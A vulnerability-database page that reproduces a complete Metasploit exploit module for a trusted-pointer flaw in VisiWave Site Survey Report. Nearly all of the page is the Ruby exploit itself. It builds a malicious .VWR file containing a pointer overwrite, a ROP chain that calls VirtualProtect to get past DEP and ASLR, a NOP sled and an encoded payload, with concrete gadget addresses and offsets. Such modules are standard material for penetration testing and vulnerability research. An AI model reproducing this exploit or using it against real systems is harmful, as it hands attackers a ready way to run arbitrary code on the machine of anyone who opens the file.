Lucene search
K

VisiWave VWR File Parsing Trusted Pointer Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 19 Views

VisiWave VWR File Parsing Trusted Pointer Vulnerability in VisiWave's Site Survey Report application can lead to code execution via a .VWR file, bypassing ASLR and DEP. A patch is available at visiwave.com to fix this issue

Code

                                                ##
# $Id: visiwave_vwr_type.rb 12716 2011-05-25 13:57:12Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'VisiWave VWR File Parsing Vulnerability',
			'Description'    => %q{
				This module exploits a vulnerability found in VisiWave's Site Survey Report application.
				When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'
				property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',
				'Image'), but if a match isn't found, the function that's supposed to handle this routine
				ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10]
				instruction.  This allows attackers to overwrite it with any arbitrary value, and results code
				execution.  A patch is available at visiwave.com; the fix is done by XORing the return value as
				null if no match is found, and then it is validated before use.

				NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a
				victim user to 'double click' the malicious VWR file and execute code.  This module was also built
				to bypass ASLR and DEP.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'mr_me',  # original discovery & msf exploit
					'TecR0c'  # msf exploit
				],
			'Version'        => '$Revision: 12716 $',
			'References'     =>
				[
					[ 'OSVDB', '72464'],
					[ 'URL', 'http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html' ],
					[ 'URL', 'http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20'],
				],
			'Payload'        =>
				{
					'Space'       => 2000,
					'BadChars'    => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3/Windows 7 SP0',
						{
							'Offset' => 3981,         # offset to rop gadgets
							'Pointer' => 0x007AF938,  # POP R32; POP R32; POP R32; ADD ESP 50; RETN ("magic" pointer)
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'May 20 2011',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'msf.vwr']),
			], self.class)
	end

	def exploit

		# Allowing nulls in our rop chain is like giving gold to midas.
		# instructions taken from the applications non aslr modules
		# libcurl.dll, VisiWaveReport.exe and blah blah
		rop_gadgets =
		[
			0x1001AFBD,  # INC EBP; PUSH ESP; POP EDI; POP ESI; POP EBP; POP EBX; RET
			0xc0fff333,  # junk
			0xc0fff333,  # junk
			0x000004cf,  # lwSize 1231 bytes
			0x100017DD,  # POP ECX; RETN
			0x10037a60,  # Writeable address from .data of libcurl.dll
			0x10011104,  # POP EDX; RETN
			0x00000040,  # RWX for VirtualProtect()
			0x10026E4D,  # MOV EAX,EDI # POP EDI # RETN 
			0x10002ac6,  # RETN
			0x10022641,  # ADD EAX, 20; RETN
			0x10022641,  # ADD EAX, 20; RETN
			0x10022641,  # ADD EAX, 20; RETN
			0x10022641,  # ADD EAX, 20; RETN
			0x10022641,  # ADD EAX, 20; RETN
			0x10022641,  # ADD EAX, 20; RETN
			0x004048B1,  # XCHG EAX,EBP
			0x1001BD3F,  # POP EAX; RETN
			0x10032048,  # IAT Address - constant pointer to VirtualProtect()
			0x1000FA4A,  # MOV EAX,DWORD PTR DS:[EAX]; RETN
			0x00657fd7,  # XCHG EAX,ESI; RETN
			0x1000af40,  # PUSHAD; RET
		].pack("V*")

		# grab the pointer to our buffer
		pointer = [target["Pointer"]].pack("V")

		sploit = pointer  # begin life in EDX
		sploit << rand_text_alphanumeric(target["Offset"])  # massive offset
		sploit << rop_gadgets      # rop chain
		sploit << make_nops(300)   # safe landing
		sploit << payload.encoded  # profit!

		vwr_data = "FileType: SSREPORT\r\n"
		vwr_data << "Product: VisiWave Site Survey, 1.6.5 Beta\r\n"
		vwr_data << "FileVersion: 10\r\n"
		vwr_data << "Item: Global Properties\r\n"
		vwr_data << "Checked: 1\r\n"
		vwr_data << "Type: #{sploit}\r\n"
		vwr_data << "SurveyFile: C:\Program Files\VisiWave Site Survey\Samples\SampleData.vws\r\n"
		vwr_data << "FloorPlanImageReport: C:\WINDOWS\Web\bullet.gif\r\n"
		vwr_data << "DefaultOrientation: 0\r\n"
		vwr_data << "Header:\r\n"
		vwr_data << "Footer:\r\n"
		vwr_data << "LeftMargin: 100\r\n"
		vwr_data << "RightMargin: 100\r\n"
		vwr_data << "TopMargin: 50\r\n"
		vwr_data << "BottomMargin: 50\r\n"
		vwr_data << "Item: #{rand_text_alpha(3)}\r\n"
		vwr_data << "Checked: 1\r\n"

		print_status("Creating '#{datastore['FILENAME']}'...")
		file_create(vwr_data)
	end

end

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
19